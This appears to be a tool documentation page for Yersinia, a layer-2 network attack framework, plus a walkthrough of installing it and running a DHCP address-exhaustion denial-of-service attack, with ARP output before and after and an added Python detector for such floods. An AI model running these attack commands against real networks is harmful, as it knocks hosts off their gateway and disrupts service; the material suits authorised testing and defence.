Yersinia

Yersinia Package Description

Yersinia is a framework for performing layer 2 attacks. It is designed to take advantage of some weaknesses in different network protocols. It aims to be a solid framework for analyzing and testing deployed networks and systems. Attacks for the following network protocols are implemented in this particular release:

  • Spanning Tree Protocol (STP)
  • Cisco Discovery Protocol (CDP)
  • Dynamic Trunking Protocol (DTP)
  • Dynamic Host Configuration Protocol (DHCP)
  • Hot Standby Router Protocol (HSRP)
  • 802.1q
  • 802.1x
  • Inter-Switch Link Protocol (ISL)
  • VLAN Trunking Protocol (VTP)

Source: https://github.com/tomac/yersinia
Yersinia Homepage | Kali Yersinia Repo

  • Author: Alfredo Andres Omella, David Barroso Berrueta
  • License: GPLv2

Tools included in the yersinia package

yersinia – Network vulnerability check software

root@kali:~# yersinia -h
               Yersinia...
               The Black Death for nowadays networks
               by Slay & tomac
               http://www.yersinia.net
               yersinia@yersinia.net
               Prune your MSTP, RSTP, STP trees!!!!


Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
       -V   Program version.
       -h   This help screen.
       -G   Graphical mode (GTK).
       -I   Interactive mode (ncurses).
       -D   Daemon mode.
       -d   Debug.
       -l logfile   Select logfile.
       -c conffile  Select config file.
  protocol   One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, mpls, stp, vtp.

Try 'yersinia protocol -h' to see protocol_options help

Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>



MOTD: The Hakin9 magazine owe money to us... 500 Euros

Yersinia Usage Example

root@kali:~# yersinia -G

 

        System requirements:

  • OpenBSD 3.4 (note: upgrade your pcap libraries to at least 0.7.2)

  • Linux 2.4.x and 2.6.x

  • Solaris 5.8 64bits SPARC

  • Mac OSX 10.4 Tiger (Intel)

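    Operating system used by the author:

    ubuntu-10.04-server-i386.iso: http://mirror.zjut.com/cdimage/ubuntu-10.04-server-i386.iso

    Virtual machine: VMware 7.0

    I. Installation steps

    After the system is installed, run the following commands inside the virtual Ubuntu system:

    1) sudo passwd root   // You are prompted to enter a new password; once it is set you can log in again to test the root account login (yersinia only works in English mode, so do not install the Chinese language pack)

    2) Make sure your virtual machine can connect to the Internet:

    [root@localhost ~]# ifconfig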
    eth0      Link encap:Ethernet  HWaddr 00:90:27:90:10:C7 
              inet addr:172.16.104.222  Bcast:172.16.104.255  Mask:255.255.255.0
              inet6 addr: 2001:1::290:27ff:fe90:10c7/64 Scope:Global
              inet6 addr: fe80::290:27ff:fe90:10c7/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:64384076 errors:0 dropped:0 overruns:0 frame:0
              TX packets:80585588 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:52522625 (50.0 MiB)  TX bytes:3316564186 (3.0 GiB)

    lo        Link encap:Local Loopback 
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:29316820 errors:0 dropped:0 overruns:0 frame:0
              TX packets:29316820 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:1189690416 (1.1 GiB)  TX bytes:1189690416 (1.1 GiB)

    [root@localhost ~]# ping 202.98.96.68
    PING 202.98.96.68 (202.98.96.68) 56(84) bytes of data.
    64 bytes from 202.98.96.68: icmp_seq=1 ttl=251 time=5.75 ms
    64 bytes from 202.98.96.68: icmp_seq=2 ttl=251 time=3.93 ms
    64 bytes from 202.98.96.68: icmp_seq=3 ttl=251 time=5.20 ms
    64 bytes from 202.98.96.68: icmp_seq=4 ttl=251 time=2.79 ms
    64 bytes from 202.98.96.68: icmp_seq=5 ttl=251 time=2.07 ms
    64 bytes from 202.98.96.68: icmp_seq=6 ttl=251 time=5.73 ms
    64 bytes from 202.98.96.68: icmp_seq=7 ttl=251 time=5.86 ms

    --- 202.98.96.68 ping statistics ---
    7 packets transmitted, 7 received, 0% packet loss, time 6000ms
    rtt min/avg/max/mdev = 2.070/4.480/5.866/1.444 ms
    [root@localhost ~]#

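    3) Install yersinia
    sudo apt-get install yersinia

    Ubuntu automatically installs all of yersinia's files from the official software repository, so you need not worry about being unfamiliar with Linux.

    Check: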

    root@ubuntu:~# yersinia
    GNU yersinia 0.7.1 $Date: 2006/03/23 08:40:14 $
    Try 'yersinia -h' to display the help.


    MOTD: Waiting for my surround speakers Audiovector Mi1 Signature... :)
    root@ubuntu:~#
    4) Install an SSH server (optional; it lets you connect over ssh instead of opening the virtual machine each time)

    sudo apt-get install openssh-server

    5) OK, the yersinia installation is complete, and we can use it to experiment with an attack.

    II. Basic usage

    2.1 yersinia help

    Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
           -V   Program version.  // show the version
           -h   This help screen.  // help
           -G   Graphical mode (GTK). // graphical interface
           -I   Interactive mode (ncurses). // interactive mode
           -D   Daemon mode. // background mode, recommended by the author
           -d   Debug. // debug mode
           -l logfile   Select logfile.
           -c conffile  Select config file. // write the attack configuration beforehand...
      protocol   One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, stp, vtp.

    Try 'yersinia protocol -h' to see protocol_options help

    Please, see the man page for a full list of options and many examples.
    Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>

     

    MOTD: I would like to see romanian wild boars, could you invite me? :)
            Mail me at slay _at_ wasahero.org

     

    2.2 yersinia attack sample

    Login username and password: root/root

    enable password: tomac

    root@ubuntu:~# telnet localhost 12000
    Trying ::1...
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.

    Welcome to yersinia version 0.7.1.
    Copyright 2004-2005 Slay & Tomac.


    login: root
    password:

    MOTD: Do you have a Lexicon CX-7? Share it!! ;)

    yersinia> ena
    Password:
    yersinia#
      cancel     Cancel running attack        
      clear      Clear stats                  
      cls        Clear screen                 
      disable    Turn off privileged commands 
      exit       Exit from current level      
      prueba     Test command                 
      run        Run attack                   
      set        Set specific params for protocols
      show       Show running system information
    yersinia#

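    For example: DHCP address exhaustion attack

    1. Specify the source interface

    yersinia# set dhcp interface eth0

    2. Start the attack

    yersinia# run dhcp   1

    The values accepted for the trailing parameter are: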
      <0>   NONDOS attack sending RAW packet
      <1>   DOS attack sending DISCOVER packet
      <2>   NONDOS attack creating DHCP rogue server
      <3>   DOS attack sending RELEASE packet
      <cr>

    3. Check

    yersinia# show attacks
       No.    Protocol    Attack
       ---    --------    ------
        0      DHCP       sending DISCOVER packet
    yersinia# show dhcp attacks
       No.    Protocol    Attack
       ---    --------    ------
        0      DHCP       sending DISCOVER packet

    4. Result

    Before the attack:

    C:\Documents and Settings\Administrator>arp -a

    Interface: 172.16.105.14 --- 0x4
      Internet Address      Physical Address      Type
      172.16.105.1          00-09-43-30-4d-c1     dynamic
      172.16.105.23         00-0c-29-1f-cf-39     dynamic

    After the attack:

    C:\Documents and Settings\Administrator>arp -a

    Interface: 172.16.105.14 --- 0x4
      Internet Address      Physical Address      Type
      172.16.105.1          00-00-00-00-00-00     invalid
      172.16.105.23         00-0c-29-1f-cf-39     dynamic

    5 seconds after cancelling the attack:

    C:\Documents and Settings\Administrator>arp -a

    Interface: 172.16.105.14 --- 0x4
      Internet Address      Physical Address      Type
      172.16.105.1          00-09-43-30-4d-c1     dynamic
      172.16.105.23         00-0c-29-1f-cf-39     dynamic
      172.16.105.248        00-0c-29-76-f3-53     dynamic
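
A defender's view of the DISCOVER flood shown above, as an added example that is not part of the original post or of yersinia: it parses DHCP payloads and flags a burst of DISCOVERs coming from many distinct client MACs. The sample packets, the `make_discover` helper and the thresholds are constructed assumptions, as is the premise that the flood presents many different client hardware addresses.

```python
import struct
from collections import deque

MAGIC = b"\x63\x82\x53\x63"  # DHCP magic cookie after the 236-byte BOOTP header
DISCOVER = 1                 # option 53 (message type) value for DHCPDISCOVER

def parse_dhcp(payload):
    """Return (client_mac, message_type) for a client request, else None."""
    if len(payload) < 240 or payload[236:240] != MAGIC:
        return None
    op, htype, hlen = struct.unpack_from("!BBB", payload, 0)
    if (op, htype, hlen) != (1, 1, 6):        # BOOTREQUEST over Ethernet only
        return None
    mac, i = payload[28:34].hex(":"), 240     # chaddr sits at offset 28
    while i < len(payload) and payload[i] != 255:   # 255 = end option
        if payload[i] == 0:                   # pad option has no length byte
            i += 1
            continue
        if i + 1 >= len(payload):
            return None                       # option code without a length
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) < length:
            return None                       # truncated option
        if payload[i] == 53 and length == 1:
            return mac, value[0]
        i += 2 + length
    return None

def detect_discover_flood(events, window=1.0, max_macs=20):
    """events: (timestamp, udp_payload) pairs in time order. Returns the timestamps at
    which more than max_macs distinct MACs sent DISCOVER within window (assumed limits)."""
    recent, alerts = deque(), []
    for ts, payload in events:
        parsed = parse_dhcp(payload)
        if not parsed or parsed[1] != DISCOVER:
            continue
        recent.append((ts, parsed[0]))
        while ts - recent[0][0] > window:     # drop entries older than the window
            recent.popleft()
        if len({mac for _, mac in recent}) > max_macs:
            alerts.append(ts)
    return alerts

def make_discover(mac, xid):
    """Constructed sample input: a minimal DHCPDISCOVER payload for a 6-byte MAC."""
    header = struct.pack("!BBBBIHH", 1, 1, 6, 0, xid, 0, 0x8000) + bytes(16)
    return header + mac + bytes(10 + 192) + MAGIC + b"\x35\x01\x01\xff"
```

On the switch side, the usual controls against this flood are DHCP snooping with a per-port rate limit and port security that caps the number of MAC addresses per access port.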

     

    Note: command parameters attached
